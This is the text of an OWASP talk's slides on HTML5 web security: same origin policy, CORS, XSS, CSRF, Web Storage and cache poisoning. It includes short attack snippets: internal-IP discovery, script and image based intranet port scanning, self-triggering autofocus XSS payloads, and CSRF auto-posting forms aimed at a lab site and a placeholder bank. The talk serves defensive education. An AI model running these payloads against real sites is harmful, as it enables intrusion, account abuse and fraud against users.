Everybody loves html5,h4ck3rs too

~#Whoami

2

Nahidul Kibria

Co-Leader, OWASP Bangladesh,Senior Software Engineer, KAZ Software Ltd.

Security Enthusiastic

Which part you care

Everybody loves html5…Well

h4ck3rs too… What!!!

3

4

What is HTML5

Next major version of HTML.

The Hypertext Markup Language version 5 (HTML5) is the successor of HTML 4.01, XHTML 1.0 and XHTML 1.1

Adds new tags, event handlers to HTML. Many more….

HTML5 is not finished

5

HTML5 is already here.

HTML5 TEST - http://html5test.com/

6

Many features

supported by

latest versions of

FireFox, Chrome,

Safari and Opera

.

Standard web model

HTML5 OVERVIEW

Web

sockets

COR

Iframe

Sandboxing

Web Messaging

WEB BROWSER SECURITY MODELS

The same origin policy

The cookies security mode

The Flash security model/SandBox

Same Origin Policy

The same origin policy prevents document or script loaded from one origin, from getting or setting properties from a of a document from a different origin.

An origin is defined as the combination of

• host name,

• protocol,

• and port number;

The Browser “Same Origin” Policy

11

bank.com

blog.net

XHR

XHR

document,

cookies

TAG

TAG

JS

What Happens if the Same Origin Policy Is Broken?

Some major HTML5 feature

• CORS-Cross-Origin Resource Sharing

• WebSockets

• WebWorkers

• Javascript APIs

13

Today I want to show you

how far an attacker go

with simple JavaScript and html5

So you can convince your boss

to give effort on security measure

My intention is not make you panic

Disclaimer

15

Cross Origin Request (COR)

• Originally Ajax calls were subject to Same OriginPolicy

• Site A cannot make XMLHttpRequests to Site B

• HTML5 makes it possible to make these cross domain

• Calls site A can now make XMLHttpRequeststo Site B as long as Site B allows it.

Response from Site B should include a header:

Access ‐Control ‐Allow‐Origin: Site A

16

Cross-Origin Resource Sharing

<allow-access-from domain="*">

The OWASP Foundationhttp://www.owasp.org

CORS-Cross-Origin Resource Sharing

1

Why programmer happy?

Lets see from attacker view

XSS-Cross Site Scripting

18

Demo

19

xss attack vector

20

Impact of xss

History Stealing

Intranet Hacking

XSS Defacements

DNS pinning

IMAP3

MHTML

Hacking JSON

Cookie stealing

Clipboard stealing

Cookie stealing

Pr3venting

XSS Defacements

If you still cannot manage your bossMore Evil use

I do not care

Show me how my

org is effected

Attacking intranet

25

Obtaining NAT’ed IP Addresses

Java applet

Java applet

Java applet

If the victim’s Web browser is a Mozilla/Firefox, it’s possible to skip the applet

27

<script>function natIP() {

var w = window.location;var host = w.host;var port = w.port || 80;var Socket = (new

java.net.Socket(host, port)).getLocalAddress().getHostAddress();return Socket;

}</script>

Demo

Not only NAT’ed IP ,You can lots more system info

28

Port Scanning

29

O’ Really

Port Scanningwindow.onerror = err;

<script src=http://ip/></script>

if (! msg.match(/Error loading script/))

//ip does not exit’s

Else

Find internal ip

Blind Web Server Fingerprinting

Apache Web Server /icons/apache_pb.gif

HP Printer /hp/device/hp_invent_logo.gif

<img src="http://intranet_ip/unique_image_url"onerror="fingerprint()" />

HTML5 Made it easy

32

www.andlabs.org/tools/jsrecon.html

Demo

What just happed

33

Port Scanning: Beating protections

Blocking example for known ports

(Firefox, WebSockets and CORS)

➔ http://example.com:22

Workaround!

➔ ftp://example.com:22

It works on Internet Explorer, Mozilla Firefox, Google Chrome and Safari

Based on timeouts, it can be configured

34

WTFun

35

Port Scanning: result

Self‐triggering XSS exploits with

HTML5A common XSS occurrence is injection inside some

attribute of INPUT tags. Current techniques require user interaction to trigger this XSS

<input type="text" value="‐>Injecting here"onmouseover="alert('Injected val')">

• HTML5 turns this in to self ‐triggering XSS

<input type="text” value="‐‐>Injecting here"onfocus="alert('Injected value')"autofocus>

36

Black‐list XSS filtersHtml5 introduce many new tag

37

How your browser become a proxy of an

attacker?

38

http://erlend.oftedal.no/blog/?blogid=107

The OWASP Foundationhttp://www.owasp.org

CSRF(Cross-Site Request Forgery)

The Sleeping Giant

Victim logon to bank.com

The OWASP Foundationhttp://www.owasp.org

Converting POST to GET

The OWASP Foundationhttp://www.owasp.org

Credentials Includedbank.com

blog.net

https://bank.com/fn?param=1

JSESSIONID=AC934234…

The OWASP Foundationhttp://www.owasp.org

Cross-Site Request Forgery

bank.com

attacker’s post at blog.net

Go to Transfer Assets

https://bank.com/fn?param=1Select FROM Fund

https://bank.com/fn?param=1Select TO Fund

https://bank.com/fn?param=1Select Dollar Amount

https://bank.com/fn?param=1Submit Transaction

https://bank.com/fn?param=1Confirm Transaction

https://bank.com/fn?param=1

The OWASP Foundationhttp://www.owasp.org

Demo

XSS & CSRF- Killer ComboProgrammers Prepare, Users Beware

<form method="POST" name="form0"

action="http://my.victim.mutillidae:81/mutillidae/index.php?page=add-to-your-blog.php">

<input type="hidden" name="csrf-token" value="SecurityIsDisabled"/>

<input type="hidden" name="blog_entry" value="This is come from CSRF"/>

<input type="hidden" name="add-to-your-blog-php-submit-button" value="Save Blog Entry"/>

</form>

The OWASP Foundationhttp://www.owasp.org

How Does CSRF Work?Tags

<img src=“https://bank.com/fn?param=1”>

<iframe src=“https://bank.com/fn?param=1”>

<script src=“https://bank.com/fn?param=1”>

Autoposting Forms<body onload="document.forms[0].submit()">

<form method="POST" action=“https://bank.com/fn”>

<input type="hidden" name="sp" value="8109"/>

</form>

XmlHttpRequestSubject to same origin policy

What Can Attackers Do with CSRF?

46

Anything an authenticated user can do

• Click links

• Fill out and submit forms

• Follow all the steps of a wizard interface

Using CSRF to Attack Internal Pages

47

attacker.com

internal.mybank.com

Allow

ed!

CSRF

Intern

al Site

TAG

internal browser

Web Workers Web Workers provide the possibility for JavaScript to run in the background.

Web Workers alone are not a security issue.

But they can be used indirectly for launching work intensive attacks without the user noticing it.

48

http://www.andlabs.org/tools/ravan.html

Web Storage

49

Web Storage Vuln. & Threats

Session Hijacking

• If session identifier is stored in local storage, it can be stolen with JavaScript.

• No HTTPOnly flag.

Disclosure of Confidential Data

• If sensitive data is stored in the local storage, it can be stolen with JavaScript.

User Tracking

• Additional possibility to identify a user.

Persistent attack vectors

• Attacker can be store persistently on the user browser

50

Offline Web Application

51

Cache Poisoning

• Caching of the root directory possible.

• HTTP and HTTPs caching possible.

52

Ok Enough, Just tell

me can attacker Get a

remote (Control)shell

of my PC??

Infection method known as Drive by download

53

In summary

54

Web Worker Cracking Hashes in JS Cloud=

Web

Worker

Cross-origin

resource

sharing+ = Powerful DDoS attacks

Web

Worker +Cross-origin

resource

sharing+

Web

socket = Web-based Botnet.

Is HTML5 hopelessly(in)secure?

Ahem no…but security has been a major consideration in the design of the specification But it is incredibly hard to add features in any technology without increasing the possibility of abused.

55

Reference

Compass Security AG

http://userguidepdf.info/html5-web-security-v1.html

http://html5sec.org

https://www.owasp.org/index.php/HTML5_Security_Cheat_Sheet

http://dev.w3.org/html5/spec/Overview.html

56

57

Twitter:@nahidupa

Be secure & safe

HTML5 make everybody happy including h4ck3rs and make security professional busy.